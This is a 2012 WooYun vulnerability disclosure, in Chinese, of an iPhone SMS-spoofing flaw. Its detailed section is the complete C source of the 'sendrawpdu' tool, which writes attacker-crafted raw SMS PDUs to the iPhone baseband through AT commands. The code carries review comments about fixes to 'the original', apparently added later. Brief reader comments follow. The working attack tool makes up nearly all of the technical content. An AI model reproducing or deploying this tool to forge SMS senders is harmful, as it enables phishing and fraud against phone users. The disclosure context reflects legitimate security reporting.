

缺陷编号:wooyun-2012-011471

漏洞标题:苹果iphone短信欺骗漏洞

相关厂商:苹果

漏洞作者: 造孽

提交时间:2012-08-28 17:35

修复时间:2012-08-28 17:35

公开时间:2012-08-28 17:35

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略




漏洞详情

披露状态:

2012-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-08-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

苹果 iPhone 的 iOS 在解析短信 PDU 中某些特殊头部时存在逻辑缺陷，可被用于伪造短信信息（短信欺骗）。下面的 sendrawpdu 工具通过 AT 命令直接向基带发送自行构造的原始 PDU，使攻击者能够投递这类精心构造的短信。

详细说明:

/*

sendrawpdu (c) 2012 pod2g

Command line tool, usage: sendrawpdu <PDU data in hex>

- Code based on iphone-elite's sendmodem ( http://code.google.com/p/iphone-elite/wiki/sendmodem )
- Just a few modifications for SMS sending and iPhone 4 compatibility.

*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <termios.h>
#include <errno.h>
#include <time.h>
#include <sys/ioctl.h>
/* Size of the modem response buffer: 64 KiB plus some slack.  readResp()
 * writes the terminating NUL at readbuf[len], so len must stay strictly
 * below BUFSIZE for that store to be in bounds. */
#define BUFSIZE (65536+100)
/* Most recent modem response; filled by readResp(), searched for "OK" by at(). */
unsigned char readbuf[BUFSIZE];
/* Raw tty configuration applied to the baseband port by initConn(). */
static struct termios term;
/* tty configuration captured before reconfiguration; restored by closeConn(). */
static struct termios gOriginalTTYAttrs;
void sendCmd(int fd, void *buf, size_t size);
void sendStrCmd(int fd, char *buf);
int readResp(int fd);
int initConn(int speed);
void closeConn(int fd);
void sendAt(int fd);
void at(int fd);
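/*
 * Write the whole buffer to the modem descriptor.
 *
 * write() on a tty may legitimately transfer fewer bytes than requested or
 * fail with EINTR; a single unchecked call could therefore truncate an AT
 * command or a PDU.  This loops until every byte is out.  A genuine write
 * error is fatal: it is reported on stderr and the process exits with 1,
 * matching the tool's existing convention (there is no recovery path for a
 * dead port).
 *
 * fd   - open descriptor of the baseband tty
 * buf  - bytes to send
 * size - number of bytes in buf (0 is a no-op)
 */
void sendCmd(int fd, void *buf, size_t size) {
	const unsigned char *cursor = buf;

	while (size > 0) {
		ssize_t written = write(fd, cursor, size);
		if (written == -1) {
			if (errno == EINTR) {
				continue; /* interrupted before anything was written: retry */
			}
			fprintf(stderr, "sendCmd error. %s\n", strerror(errno));
			exit(1);
		}
		cursor += written;
		size -= (size_t)written;
	}
}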
/*
 * Send a NUL-terminated command string to the modem; the terminator itself
 * is not transmitted.  Delegates to sendCmd() for the actual write.
 */
void sendStrCmd(int fd, char *buf) {
	size_t length = strlen(buf);
	sendCmd(fd, buf, length);
}
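/*
 * Collect whatever the modem sends within the timeout window into readbuf.
 *
 * Waits up to 1.5 s for the first byte, then keeps reading while more data
 * arrives within 0.5 s of the previous chunk.  Stops early on EOF (read()
 * returning 0), on a read error, or when the buffer is full.  The original
 * added read()'s return value to len unconditionally, so a -1 corrupted the
 * count, an EOF spun forever (select() reports a closed port as readable),
 * and a full buffer put the terminating NUL one past the end of readbuf.
 *
 * The bytes collected are NUL-terminated and echoed to stderr.
 *
 * fd - baseband tty descriptor
 * Returns the number of bytes stored in readbuf (0 on timeout).
 */
int readResp(int fd) {
	size_t len = 0;
	/* Keep one byte free for the terminating NUL. */
	const size_t cap = BUFSIZE - 1;
	struct timeval timeout = { .tv_sec = 1, .tv_usec = 500000 };
	fd_set readfds;

	while (len < cap) {
		FD_ZERO(&readfds);
		FD_SET(fd, &readfds);
		int ready = select(fd + 1, &readfds, NULL, NULL, &timeout);
		if (ready == -1 && errno == EINTR) {
			continue; /* signal; retry with whatever time remains */
		}
		if (ready <= 0) {
			break; /* timeout or select() error: response is complete */
		}
		ssize_t n = read(fd, readbuf + len, cap - len);
		if (n <= 0) {
			break; /* EOF or read error: nothing more will arrive */
		}
		len += (size_t)n;
		/* Later chunks only get the shorter inter-chunk timeout. */
		timeout.tv_sec = 0;
		timeout.tv_usec = 500000;
	}
	readbuf[len] = 0;
	fprintf(stderr, "%s", (const char *)readbuf);
	return (int)len;
}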
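/*
 * Open and configure the baseband AT-command channel.
 *
 * The device node is the "extra_0" DLCI of the SPI baseband link; the path
 * is hard-coded (the header comment ties it to iPhone 4 compatibility).
 * The port is switched to raw 8N1 with CLOCAL (ignore modem-control lines)
 * and VMIN=VTIME=0 so read() returns whatever is available and readResp()
 * can pace itself with select().  The previous settings are kept in
 * gOriginalTTYAttrs for closeConn() to restore.
 *
 * speed - baud rate handed to cfsetspeed(); main() passes 115200.
 *         NOTE(review): a literal baud value matches Darwin's speed_t
 *         convention; on Linux cfsetspeed() expects a Bxxx constant.
 *
 * Returns the open descriptor.  Failures that leave the port unusable
 * (open, tcgetattr, tcsetattr) are reported on stderr and terminate the
 * process with status 1, matching the tool's existing convention; the
 * original silently ignored the tc*attr results.  Exclusive access and the
 * baud change are best-effort and only produce a warning.
 */
int initConn(int speed) {
	int fd = open("/dev/dlci.spi-baseband.extra_0", O_RDWR | O_NOCTTY);

	if (fd == -1) {
		fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
		exit(1);
	}

	/* Exclusive access is best-effort: warn and carry on without it. */
	if (ioctl(fd, TIOCEXCL) == -1) {
		fprintf(stderr, "warning: TIOCEXCL failed: %s\n", strerror(errno));
	}
	/* Clear O_NONBLOCK and friends; pacing is done with select() instead. */
	if (fcntl(fd, F_SETFL, 0) == -1) {
		fprintf(stderr, "warning: F_SETFL failed: %s\n", strerror(errno));
	}

	if (tcgetattr(fd, &term) == -1) {
		fprintf(stderr, "tcgetattr: %s\n", strerror(errno));
		close(fd);
		exit(1);
	}
	gOriginalTTYAttrs = term;

	cfmakeraw(&term);
	if (cfsetspeed(&term, speed) == -1) {
		fprintf(stderr, "warning: cfsetspeed(%d) failed: %s\n", speed, strerror(errno));
	}
	term.c_cflag = CS8 | CLOCAL | CREAD;
	term.c_iflag = 0;
	term.c_oflag = 0;
	term.c_lflag = 0;
	term.c_cc[VMIN] = 0;
	term.c_cc[VTIME] = 0;
	if (tcsetattr(fd, TCSANOW, &term) == -1) {
		fprintf(stderr, "tcsetattr: %s\n", strerror(errno));
		close(fd);
		exit(1);
	}

	return fd;
}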
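/*
 * Release the baseband port: wait for queued output to drain, restore the
 * tty settings initConn() saved in gOriginalTTYAttrs, and close the
 * descriptor.  Teardown is best-effort — each failure is reported on stderr
 * (the original discarded all three return values) but never aborts, so the
 * process exit status reflects the SMS send rather than the cleanup.
 */
void closeConn(int fd) {
	if (tcdrain(fd) == -1) {
		fprintf(stderr, "warning: tcdrain failed: %s\n", strerror(errno));
	}
	if (tcsetattr(fd, TCSANOW, &gOriginalTTYAttrs) == -1) {
		fprintf(stderr, "warning: could not restore tty attributes: %s\n", strerror(errno));
	}
	if (close(fd) == -1) {
		fprintf(stderr, "warning: close failed: %s\n", strerror(errno));
	}
}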
/*
 * Send a bare "AT\r" probe.  at() uses this to confirm the modem is
 * answering before any real command is issued.
 */
void sendAt(int fd) {
	static char probe[] = "AT\r";
	/* sizeof includes the NUL; transmit only the three command bytes. */
	sendCmd(fd, probe, sizeof probe - 1);
}
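/* Upper bound on "AT" probes before giving up; each waits up to 1.5 s. */
enum { AT_MAX_ATTEMPTS = 20 };

/*
 * Synchronise with the modem: send "AT" until a response containing "OK"
 * comes back.
 *
 * The original retried forever, so a baseband that never answers (wrong
 * device node, port held by another process, modem not yet up) hung the
 * tool indefinitely.  Now gives up after AT_MAX_ATTEMPTS probes and exits
 * with status 1, following the tool's existing fatal-error convention.
 *
 * fd - baseband tty descriptor
 */
void at(int fd) {
	int attempt;

	for (attempt = 0; attempt < AT_MAX_ATTEMPTS; attempt++) {
		sendAt(fd);
		if (readResp(fd) > 0 && strstr((const char *)readbuf, "OK") != NULL) {
			return;
		}
	}
	fprintf(stderr, "at: no OK from modem after %d attempts\n", AT_MAX_ATTEMPTS);
	exit(1);
}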
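/* Locale-independent hex-digit test (avoids pulling in <ctype.h>). */
static int is_hex_digit(char c) {
	return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') || (c >= 'A' && c <= 'F');
}

/*
 * Validate the PDU argument: non-empty, even length (whole octets), hex
 * digits only, and no longer than max_chars so it fits the command buffer.
 * Returns the number of octets it encodes, or -1 if the argument is rejected.
 */
static long pdu_octets(const char *hex, size_t max_chars) {
	size_t len = strlen(hex);
	size_t i;

	if (len == 0 || (len % 2) != 0 || len > max_chars) {
		return -1;
	}
	for (i = 0; i < len; i++) {
		if (!is_hex_digit(hex[i])) {
			return -1;
		}
	}
	return (long)(len / 2);
}

/*
 * Entry point: sendrawpdu <PDU data in hex>.
 *
 * Opens the baseband port, waits for the modem to answer "AT", selects PDU
 * mode (AT+CMGF=0), announces the TPDU length with AT+CMGS, then sends the
 * hex PDU terminated by Ctrl-Z (\032) and echoes each response to stderr.
 *
 * The original copied argv[1] into a 1024-byte stack buffer with sprintf()
 * — a stack overflow for any argument of 1023+ characters — and computed
 * strlen/2 - 1 on unvalidated input, which underflows for arguments shorter
 * than four characters.  The argument is now checked before any I/O and the
 * formats are bounded with snprintf().
 *
 * Exits with status 1 on usage or validation errors (and via the helpers on
 * any port failure); returns 0 after the send sequence completes.
 */
int main(int argc, char **argv) {
	int fd;
	char cmd[1024];
	/* Leave room for the trailing Ctrl-Z and the NUL terminator. */
	const size_t max_pdu_chars = sizeof cmd - 2;
	long octets;

	if (argc < 2) {
		fprintf(stderr, "usage: %s <pdu data>\n", argv[0]);
		exit(1);
	}
	octets = pdu_octets(argv[1], max_pdu_chars);
	/* The length sent to +CMGS is octets - 1, so at least two are needed. */
	if (octets < 2) {
		fprintf(stderr, "invalid PDU: expected an even-length hex string of 4..%zu characters\n", max_pdu_chars);
		exit(1);
	}

	fd = initConn(115200);
	at(fd);
	sendStrCmd(fd, "AT+CMGF=0\r");
	readResp(fd);
	/* Keeps the original's strlen/2 - 1 arithmetic for the +CMGS length.
	 * NOTE(review): this presumably excludes a one-octet SMSC-length field
	 * from the count; PDUs carrying an explicit SMSC number would need a
	 * different length — verify against the PDUs actually used. */
	snprintf(cmd, sizeof cmd, "AT+CMGS=%ld\r", octets - 1);
	sendStrCmd(fd, cmd);
	readResp(fd);
	snprintf(cmd, sizeof cmd, "%s\032", argv[1]);
	sendStrCmd(fd, cmd);
	readResp(fd);
	closeConn(fd);
	return 0;
}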

漏洞证明:

修复方案:

版权声明:转载请注明来源 造孽@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2012-08-28 18:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    http://radiowar.org/security/iphone%E7%9F%AD%E4%BF%A1%E6%AC%BA%E9%AA%97%E6%BC%8F%E6%B4%9E%E6%8A%AB%E9%9C%B2.html这个地方分析得比较详细,是ios在处理短信协议某些特殊头部时导致的问题

  2. 2012-08-28 21:04 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    这样也行啊。。。

  3. 2012-08-29 10:29 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    10086亮了。